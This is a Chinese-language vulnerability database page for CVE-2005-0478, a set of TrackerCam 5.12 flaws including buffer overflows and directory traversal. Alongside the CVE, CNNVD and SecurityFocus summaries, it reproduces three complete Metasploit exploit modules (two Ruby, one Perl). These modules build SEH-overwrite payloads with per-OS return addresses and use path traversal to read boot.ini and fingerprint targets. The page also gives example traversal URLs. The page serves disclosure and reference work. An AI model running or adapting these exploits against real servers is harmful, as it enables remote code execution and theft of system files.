CVE-2005-0478
CVSS5.0
发布时间 :2005-03-30 00:00:00
修订时间 :2008-09-05 16:46:24
NMCOEPS    

[原文]Multiple buffer overflows in TrackerCam 5.12 and earlier allow remote attackers to cause a denial of service and possibly execute arbitrary code via (1) an HTTP request with a long User-Agent header or (2) a long argument to an arbitrary PHP script.


[CNNVD]TrackerCam 多个缓冲区溢出漏洞(CNNVD-200503-160)

        TrackerCam是一款基于Web的摄像头查看管理软件。
        TrackerCam实现上存在多个安全漏洞,远程攻击者可以利用这些漏洞在服务器上执行任意指令、获取敏感信息或导致拒绝服务。
        具体的漏洞如下:
        1. HTTP请求中超长(大于216字节)的User-Agent字段值会导致服务器缓冲区溢出。
        2. HTTP请求中超长(大于256字节)的PHP请求参数会导致服务器缓冲区溢出。
        3. 软件的ComGetLogFile.php3脚本对fn参数值做充分的检查过滤,远程攻击者可以在输入中插入"../"串遍历服务器的目录,访问任意文件。
        4. 攻击者可以在日志文件中插入HTML代码。
        5. 软件的ComGetLogFile.php3脚本可以用来浏览日志中记录的登录相关的信息,其中包括口令。
        6. 多次向服务器发送Content-Length字段为负数的HTTP请求,会导致服务器崩溃。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0478
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0478
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200503-160
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/19411
(UNKNOWN)  XF  trackercam-php-bo(19411)
http://xforce.iss.net/xforce/xfdb/19409
(UNKNOWN)  XF  trackercam-useragent-bo(19409)
http://www.securityfocus.com/bid/12592
(VENDOR_ADVISORY)  BID  12592
http://www.securityfocus.com/archive/1/390918
(VENDOR_ADVISORY)  BUGTRAQ  20050218 Multiple vulnerabilities in TrackerCam 5.12

- 漏洞信息

TrackerCam 多个缓冲区溢出漏洞
中危 缓冲区溢出
2005-03-30 00:00:00 2005-10-20 00:00:00
远程  
        TrackerCam是一款基于Web的摄像头查看管理软件。
        TrackerCam实现上存在多个安全漏洞,远程攻击者可以利用这些漏洞在服务器上执行任意指令、获取敏感信息或导致拒绝服务。
        具体的漏洞如下:
        1. HTTP请求中超长(大于216字节)的User-Agent字段值会导致服务器缓冲区溢出。
        2. HTTP请求中超长(大于256字节)的PHP请求参数会导致服务器缓冲区溢出。
        3. 软件的ComGetLogFile.php3脚本对fn参数值做充分的检查过滤,远程攻击者可以在输入中插入"../"串遍历服务器的目录,访问任意文件。
        4. 攻击者可以在日志文件中插入HTML代码。
        5. 软件的ComGetLogFile.php3脚本可以用来浏览日志中记录的登录相关的信息,其中包括口令。
        6. 多次向服务器发送Content-Length字段为负数的HTTP请求,会导致服务器崩溃。
        

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        http://www.trackercam.com

- 漏洞信息 (16811)

TrackerCam PHP Argument Buffer Overflow (EDBID:16811)
windows webapps
2010-05-09 Verified
8090 metasploit
N/A [点击下载]
##
# $Id: trackercam_phparg_overflow.rb 9262 2010-05-09 17:45:00Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'TrackerCam PHP Argument Buffer Overflow',
			'Description'    => %q{
					This module exploits a simple stack buffer overflow in the
				TrackerCam web server. All current versions of this software
				are vulnerable to a large number of security issues. This
				module abuses the directory traversal flaw to gain
				information about the system and then uses the PHP overflow
				to execute arbitrary code.
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9262 $',
			'References'     =>
				[
					[ 'CVE', '2005-0478'],
					[ 'OSVDB', '13953'],
					[ 'OSVDB', '13955'],
					[ 'BID', '12592'],
					[ 'URL', 'http://aluigi.altervista.org/adv/tcambof-adv.txt'],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 2048,
					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					# EyeWD.exe has a null and we can not use a partial overwrite.
					# All of the loaded application DLLs have a null in the address,
					# except CPS.dll, which moves around between instances :-(

					['Windows 2000 English',		{ 'Ret' => 0x75022ac4 }], # ws2help.dll
					['Windows XP English SP0/SP1',	{ 'Ret' => 0x71aa32ad }], # ws2help.dll
					['Windows NT 4.0 SP4/SP5/SP6',	{ 'Ret' => 0x77681799 }], # ws2help.dll

					# Windows XP SP2 and Windows 2003 are not supported yet :-/
				],
			'DisclosureDate' => 'Feb 18 2005',
			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(8090)
			], self.class)
	end

	def check
		res = send_request_raw({
			'uri'   => '/tuner/ComGetLogFile.php3',
			'query' => 'fn=../HTTPRoot/socket.php3'
		}, 5)

		if (res and res.body =~ /fsockopen/)
			fp = fingerprint()
			print_status("Detected a vulnerable TrackerCam installation on #{fp}")
			return Exploit::CheckCode::Confirmed
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		c = connect

		buf = rand_text_english(8192)
		seh = generate_seh_payload(target.ret)
		buf[257, seh.length] = seh

		print_status("Sending request...")
		res = send_request_raw({
			'uri'   => '/tuner/TunerGuide.php3',
			'query' => 'userID=' + buf
		}, 5)

		handler
	end

	def download(path)

		res = send_request_raw({
			'uri'   => '/tuner/ComGetLogFile.php3',
			'query' => 'fn=' + ("../" * 10) + path
		}, 5)

		return if !(res and res.body and res.body =~ /tuner\.css/ and res.body =~ /<pre>/)

		m = res.match(/<pre>(.*)<\/pre><\/body>/smi)
		return if not m
		return m[1]
	end

	def fingerprint

		res = download(rand_text_alphanumeric(12) + '.txt')
		return if not res

		m = res.match(/in <b>(.*)<\/b> on line/smi)
		return if not m

		path = m[1]

		print_status("TrackerCam installation path is #{path}")

		if (path !~ /^C/i)
			print_status("TrackerCam is not installed on the system drive, we can't fingerprint it")
			return
		end

		if (path !~ /Program Files/i)
			print_status("TrackerCam is installed in a non-standard location")
		end

		boot = download('boot.ini')
		return if not boot

		case boot
			when /Windows XP.*NoExecute/i
				return "Windows XP SP2+"
			when /Windows XP/
				return "Windows XP SP0-SP1"
			when /Windows.*2003/
				return "Windows 2003"
			when /Windows.*2000/
				return "Windows 2000"
			else
				return "Unknown OS/SP"
		end
	end

end
		

- 漏洞信息 (F82949)

TrackerCam PHP Argument Buffer Overflow (PacketStormID:F82949)
2009-11-26 00:00:00
H D Moore  metasploit.com
exploit,web,overflow,arbitrary,php
CVE-2005-0478
[点击下载]

This Metasploit module exploits a simple stack overflow in the TrackerCam web server. All current versions of this software are vulnerable to a large number of security issues. This Metasploit module abuses the directory traversal flaw to gain information about the system and then uses the PHP overflow to execute arbitrary code.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'TrackerCam PHP Argument Buffer Overflow',
			'Description'    => %q{
				This module exploits a simple stack overflow in the
				TrackerCam web server. All current versions of this software
				are vulnerable to a large number of security issues. This
				module abuses the directory traversal flaw to gain
				information about the system and then uses the PHP overflow
				to execute arbitrary code.
					
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2005-0478'],
					[ 'OSVDB', '13953'],
					[ 'OSVDB', '13955'],
					[ 'BID', '12592'],
					[ 'URL', 'http://aluigi.altervista.org/adv/tcambof-adv.txt'],

				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 2048,
					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
					'StackAdjustment' => -3500,

				},
			'Platform'       => 'win',
			'Targets'        => 
				[
					# EyeWD.exe has a null and we can not use a partial overwrite.
					# All of the loaded application DLLs have a null in the address,
					# except CPS.dll, which moves around between instances :-(
					
					['Windows 2000 English',		{ 'Ret' => 0x75022ac4 }], # ws2help.dll
					['Windows XP English SP0/SP1',	{ 'Ret' => 0x71aa32ad }], # ws2help.dll
					['Windows NT 4.0 SP4/SP5/SP6',	{ 'Ret' => 0x77681799 }], # ws2help.dll
					
					# Windows XP SP2 and Windows 2003 are not supported yet :-/					
				],
			'DisclosureDate' => 'Feb 18 2005',
			'DefaultTarget' => 0))

			register_options(
				[
					Opt::RPORT(8090)
				], self.class)			
	end

	def check
		res = send_request_raw({
			'uri'   => '/tuner/ComGetLogFile.php3',
			'query' => 'fn=../HTTPRoot/socket.php3'
		}, 5)
		
		if (res and res.body =~ /fsockopen/)
			fp = fingerprint()
			print_status("Detected a vulnerable TrackerCam installation on #{fp}")
			return Exploit::CheckCode::Confirmed
		end
		return Exploit::CheckCode::Safe
	end
	
	def exploit
		c = connect
		
		buf = rand_text_english(8192)
		seh = generate_seh_payload(target.ret)
		buf[257, seh.length] = seh
		
		print_status("Sending request...")
		res = send_request_raw({
			'uri'   => '/tuner/TunerGuide.php3',
			'query' => 'userID=' + buf
		}, 5)
				
		handler
	end

	def download(path)
	
		res = send_request_raw({
			'uri'   => '/tuner/ComGetLogFile.php3',
			'query' => 'fn=' + ("../" * 10) + path
		}, 5)

		return if !(res and res.body and res.body =~ /tuner\.css/ and res.body =~ /<pre>/)

		m = res.match(/<pre>(.*)<\/pre><\/body>/smi)
		return if not m
		return m[1]
	end
	
	def fingerprint
		
		res = download(rand_text_alphanumeric(12) + '.txt')
		return if not res
		
		m = res.match(/in <b>(.*)<\/b> on line/smi)
		return if not m
		
		path = m[1]
		
		print_status("TrackerCam installation path is #{path}")
		
		if (path !~ /^C/i) 
			print_status("TrackerCam is not installed on the system drive, we can't fingerprint it")
			return
		end
		
		if (path !~ /Program Files/i) 
			print_status("TrackerCam is installed in a non-standard location")
		end		
		
		boot = download('boot.ini')
		return if not boot
		
		case boot
			when /Windows XP.*NoExecute/i
				return "Windows XP SP2+"
			when /Windows XP/
				return "Windows XP SP0-SP1"
			when /Windows.*2003/
				return "Windows 2003"
			when /Windows.*2000/
				return "Windows 2000"
			else
				return "Unknown OS/SP"
		end	
	end
	
end
    

- 漏洞信息 (F36461)

trackercam_phparg_overflow.pm (PacketStormID:F36461)
2005-03-05 00:00:00
H D Moore  
exploit,web,overflow,arbitrary,php
CVE-2005-0478
[点击下载]

This module exploits a simple stack overflow in the TrackerCam web server. All current versions of this software are vulnerable to a large number of security issues. This module abuses the directory traversal flaw to gain information about the system and then uses the PHP overflow to execute arbitrary code.

##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::trackercam_phparg_overflow;
use base "Msf::Exploit";
use strict;
use Pex::Text;

my $advanced = { };

my $info =
{
	'Name'     => 'TrackerCam PHP Argument Buffer Overflow',
	'Version'  => '$Revision: 1.3 $',
	'Authors'  => [ 'H D Moore <hdm [at] metasploit.com>' ],
	'Arch'     => [ 'x86' ],
	'OS'       => [ 'win32'],
	'Priv'     => 1,
	'AutoOpts' => { 'EXITFUNC' => 'thread' },
	
	'UserOpts' => 
	{
		'RHOST' => [1, 'ADDR', 'The target address'],
		'RPORT' => [1, 'PORT', 'The target port', 8090],
	},

	'Payload' => 
	{
		'Space'		=> 2048,
		'BadChars'	=> "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
		'Prepend'	=> "\x81\xc4\x54\xf2\xff\xff",	# add esp, -3500					
		'Keys'		=> ['+ws2ord'],
	},

	'Description'  => Pex::Text::Freeform(qq{
		This module exploits a simple stack overflow in the TrackerCam web
	server. All current versions of this software are vulnerable to a large
	number of security issues. This module abuses the directory traversal
	flaw to gain information about the system and then uses the PHP overflow
	to execute arbitrary code.
	}),

	'Refs'    => 
	[
		['OSVDB', '13953'],	
		['OSVDB', '13955'],
		['CVE', '2005-0478'],
		['BID', '12592'],
		['URL', 'http://aluigi.altervista.org/adv/tcambof-adv.txt'],	
	],
	
	'Targets' => 
	[
		# EyeWD.exe has a null and we can not use a partial overwrite.
		# All of the loaded application DLLs have a null in the address...
		# Except CPS.dl, which moves around between instances.
		
		# Windows XP SP2 and Windows 2003 are not supported yet :-/
		
		['Windows 2000 English',		0x75022ac4 ], # ws2help.dll
		['Windows XP English SP0/SP1',	0x71aa32ad ], # ws2help.dll
		['Windows NT 4.0 SP4/SP5/SP6',	0x77681799 ], # ws2help.dll
	],
	
	'Keys'    => ['trackercam'],
};

sub new {
	my $class = shift;
	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
	return($self);
}

sub Check {
	my $self = shift;
	my $s = $self->Connect;

	if ($s->IsError) {
		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
		return $self->CheckCode('Connect');
	}
	
	$self->PrintLine("[*] Querying the remote web server...");

	my $path = "/tuner/ComGetLogFile.php3?fn=../HTTPRoot/socket.php3";
	my $req  = "GET $path HTTP/1.0\r\n\r\n";
	
	$s->Send($req);
	my $res = $s->Recv(-1, 5);
	$s->Close;
	
	if ($res =~ /fsockopen/) {
		$self->PrintLine("[*] Vulnerable TrackerCam instance discovered");
		$self->Fingerprint();
		return $self->CheckCode('Confirmed');	
	}

	$self->PrintLine("[*] This TrackerCam service appears to be patched");
	return $self->CheckCode('Safe');
}

sub Exploit {
	my $self		= shift;
	my $target_idx	= $self->GetVar('TARGET');
	my $shellcode	= $self->GetVar('EncodedPayload')->Payload;
	my $target		= $self->Targets->[$target_idx];

	$self->PrintLine("[*] Attempting to exploit target " . $target->[0]);

	my $s = $self->Connect;

	if ($s->IsError) {
		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
		return;
	}
	
	my $bang = Pex::Text::EnglishText(8192);
	
	# Simple as pie.
	substr($bang, 257, 4, pack('V', $target->[1]));
	substr($bang, 253, 2, "\xeb\x06");
	substr($bang, 261, length($shellcode), $shellcode);
	
	my $data  = "GET /tuner/TunerGuide.php3?userID=$bang HTTP/1.0\r\n\r\n";

	$self->PrintLine("[*] Sending " .length($data) . " bytes to remote host.");
	$s->Send($data);
	$s->Recv(-1, 5);
	
	return;
}

# Uses the directory traversal vulnerability to detect the remote OS version
sub Fingerprint {
	my $self = shift;
	my $data = $self->DownloadFile('nobody.txt');
	
	if (! $data ) {
		$self->PrintLine("[*] Download failed for remote test file");
		return;
	}	

	my ($path) = $data =~ m/in <b>(.*)<\/b> on line/smi;
	$self->PrintLine("[*] Install path: $path") if $path;
			
	if (uc(substr($path, 0, 1)) ne 'C') {
		$self->PrintLine("[*] TrackerCam is probably not installed on the system drive");
	}
	
	if ($data !~ /Program Files/) {
		$self->PrintLine("[*] TrackerCam is installed in a non-standard location");

	}
		
	$data = $self->DownloadFile('boot.ini');
	if (! $data ) {
		$self->PrintLine("[*] Download failed for remote boot.ini file");
		return;
	}

	# Windows XP SP2
	if ($data =~ /Windows XP.*NoExecute/i) {
		$self->PrintLine("[*] Detected Windows XP SP2");
		return 'WinXPSP2';
	}

	if ($data =~ /Windows XP/) {
		$self->PrintLine("[*] Detected Windows XP SP0-SP1");
		return 'WinXPSP01';
	}

	if ($data =~ /Windows.*2003/) {
		$self->PrintLine("[*] Detected Windows 2003 Server");
		return 'Win2003';		
	}

	if ($data =~ /Windows.*2000/) {
		$self->PrintLine("[*] Detected Windows 2000");
		return 'Win2000';
	}

	$self->PrintLine("[*] Could not identify this system");
	return;
}

sub DownloadFile {
	my $self = shift;
	my $file = shift;
	
	my $s = $self->Connect;
	return if $s->IsError;
	
	my $path = "/tuner/ComGetLogFile.php3?fn=../../../../../../../../../$file";
	my $req  = "GET $path HTTP/1.0\r\n\r\n";
	
	$s->Send($req);
	my $res = $s->Recv(8192, 5);
	$s->Close;
	
	return if ($res !~ /tuner\.css/ || $res !~ /\<pre\>/ );
	
	my ($data) = $res =~ m/<pre>(.*)/smi;
	$data =~ s/<\/pre><\/body>.*//g if $data;
	
	return $res if ! $data;
	return $data;
}

sub Connect {
	my $self = shift;
	my $s = Msf::Socket::Tcp->new
	(
		'PeerAddr'	=> $self->GetVar('RHOST'),
		'PeerPort'	=> $self->GetVar('RPORT'),
		'SSL'		=> $self->GetVar('SSL'),
		'LocalPort'	=> $self->GetVar('CPORT'),
	);
	return $s;
}

1;

    

- 漏洞信息

13952
TrackerCam HTTP User-Agent Field Remote Overflow
Remote / Network Access Denial of Service, Input Manipulation
Loss of Integrity, Loss of Availability
Exploit Public

- 漏洞描述

A remote overflow exists in TrackerCam. The server fails to properly check the input of an HTTP User-Agent request resulting in a buffer overflow. With a specially crafted request, an attacker can cause the execution of arbitrary code resulting in a loss of integrity.

- 时间线

2005-02-18 Unknow
2005-02-18 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

- 漏洞信息

TrackerCam Multiple Remote Vulnerabilities
Unknown 12592
Yes No
2005-02-18 12:00:00 2009-11-27 12:45:00
Discovery of these vulnerabilities is credited to Luigi Auriemma <aluigi@autistici.org>.

- 受影响的程序版本

TrackerCam TrackerCam 5.12

- 漏洞讨论

TrackerCam is prone to multiple remote vulnerabilities, including buffer-overflow issues, a directory-traversal issue, an information-disclosure issue, an HTML-injection issue, and denial-of-service issues.

A remote attacker could exploit these issues to execute arbitrary code, obtain potentially sensitive information, launch phishing attacks or steal cookie based authentication credentials, and deny service to legitimate users.

- 漏洞利用

The following examples are available:

http://www.example.com:8090/MessageBoard/messages.php?aaaaaaaaaaa[256]aaaa
http://www.example.com:8090/tuner/ComGetLogFile.php3?fn=../../../../windows/system.ini
http://www.example.com:8090/tuner/ComGetLogFile.php3?fn=Eye2005_02.log

An exploit as well as a Metasploit exploit module are available:

- 解决方案

Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站